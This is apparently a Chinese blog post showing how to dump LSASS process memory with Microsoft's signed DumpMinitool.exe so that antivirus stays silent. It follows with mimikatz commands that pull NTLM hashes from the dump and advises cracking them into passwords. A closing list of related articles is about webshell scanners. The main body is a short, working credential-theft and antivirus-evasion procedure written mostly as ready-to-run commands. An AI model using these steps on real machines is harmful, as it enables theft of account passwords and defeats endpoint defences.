绕过查杀工具实现lsass转储
最近看到mrd0x分享了一个程序通过此程序执行命令获取lsass转储文件,此文件是vs2022里的DumpMinitool.exe。此程序路径为:
C:\ProgramFiles\MicrosoftVisualStudio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
接下来测试一下效果,先看一下程序信息
查看数字签名发现是微软,到这已经可以预见测试效果了,接下来开始正式测试。
使用火绒对程序扫描:
使用程序执行命令
DumpMinitool.exe --file lsass.dmp --processId 512 --dumpType Full
整个过程杀软没有任何动静。
dump完成后拿到本地使用mimikatz获取到ntlm,首先把lsass.dmp文件放到程序目录下,然后执行以下命令
mimikatz.exe
sekurlsa::minidump "lsass.dmp"
sekurlsa::logonpasswords
执行完成后,拿到账户的ntlm值,使用解密网站解密即可获取到密码。
文章中使用的相关工具关注微信公众号并后台回复 “密码" 两字 即可获取
绕过查杀工具实现lsass转储相关推荐
- [应急响应]7款WebShell扫描检测查杀工具
1.D盾 防火墙 阿D出品,免费,GUI,WebShell扫描检测查杀 功能特性简介 支持系统:win2003/win2008/win2012/win2016 PHP支持:FastCGI/ISAPI ...
- 网站后门查杀工具推荐
作为一个小站长,对于网站的后门代码肯定是深恶痛绝的,尤其是在建站初期,因为一些原因而使用非正版主题,很容易出现这个问题,而往往一些不良的代码贩子,总喜欢给自己贩卖的主题等源代码贴上完美破解.无后门等标 ...
- 恶意软件查杀工具分享
此分享为恶意软件查杀工具,百度云盘下载云盘下载链接 提取码:py07 此链接永久有效
- 1.41亿部手机装有间谍软件! 360推国内首个CIQ查杀工具
近日,一款名为Carrier IQ(简称CIQ)的内核级间谍软件被曝光.该软件会暗中收集用户隐私信息,甚至每按下一个键盘都会被秘密地记录在案.中国不少智能手机用户,尤其是水货手机用户人心惶惶.对此,3 ...
- 常见的 Webshell 查杀工具
前言 当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现webshell,进一步排查系统可能存在的安全漏洞. 本文推荐了10款 WebShll 检测工具,用于网站入侵排查.当然 ...
- 应急响应之Webshell查杀工具
当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现webshell,进一步排查系统可能存在的安全漏洞. 本文推荐了10款Webshll检测工具,用于网站入侵排查.当然,目前市场 ...
- 突发,千万别重启!incaseformat蠕虫病毒来袭,警惕文件遭全盘删除(附:免费查杀工具)
2021年1月13日,国内某著名安全团队监测到一种名为incaseformat的蠕虫病毒在国内爆发, 该蠕虫病毒执行后会自复制到系统盘Windows目录下,并创建注册表自启动,一旦用户重启主机,使得病 ...
- 应急响应入侵排查之第三篇常见的 Webshell 在线查杀工具
文章目录 前言 工具一:D盾_Web查杀 工具二:百度 WEBDIR+ 工具三:河马 工具四:bot_net 摘抄 前言 当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现we ...
- linux系统 网站木马后门Webshell查杀工具源码
后门这东西好让人头疼,第一文件太多了,不容易找,第二,难找,需要特征匹配啊.搞了一个python版查杀php webshell后门工具,大家可以增加后门的特征码,然后甩到后台给他查杀就可以了.适合Li ...
- webshell查杀工具
D盾_Web查杀:http://www.d99net.net/index.asp 河马webshell查杀:http://www.shellpub.com 深信服Webshell网站后门检测工具:ht ...
最新文章
- URLEncoder和URLDecoder中特殊字符的处理方案 URL传值问题
- 真假应用傻傻分不清,HideIcon病毒玩起“隐身计”
- 2020\Simulation_1\4.数字9
- Abp VNext 集成sharding-core 分表分库
- element ui 表单验证为正整数
- 值对于 int32 太大或太小_怎样将视频文件变小却对画质没有太大影响呢?
- 计算机技术博客博客知乎,我的技术博客的选择:CSDN、博客园、简书、知乎专栏仍是Github Page?...
- 面试:一文搞懂 final 关键字的作用
- 扩展中断控制器8259实验_「正点原子FPGA连载」第十三章双核AMP实验
- 《Linux命令行与shell脚本编程大全》第十八章 图形化桌面环境中的脚本编程
- DAY16-T1342面试题 05.08 -2022-01-31-非自己作答
- python爬取数据教程_python爬虫爬取网页数据并解析数据
- 如何更改python界面颜色_pycharm修改界面主题颜色的方法 pycharm怎么恢复默认设置...
- 编译g2o提示错误 error: ‘ScalarBinaryOpTraits’ is not a class template
- android studio 魅族真机 flyme6 下logcat 打印自定义日志
- Laravel的ORM模型的find(),findOrFail(),first(),firstOrFail(),get(),list(),toArray()之间的区别是什么?
- 华为android9王者荣耀卡,华为mate9玩王者荣耀怎么样 mate9玩王者荣耀卡吗
- 在电脑上打开手机当前浏览的网页
- 轻松实现网页中通过链接跳转到QQ聊天界面,通过链接加QQ群,自动打开聊天对话框等等,包含电脑版和手机版的实现,示例部分Android和iOS的代码
- 为什么日本的网页设计风格还停留在90年代?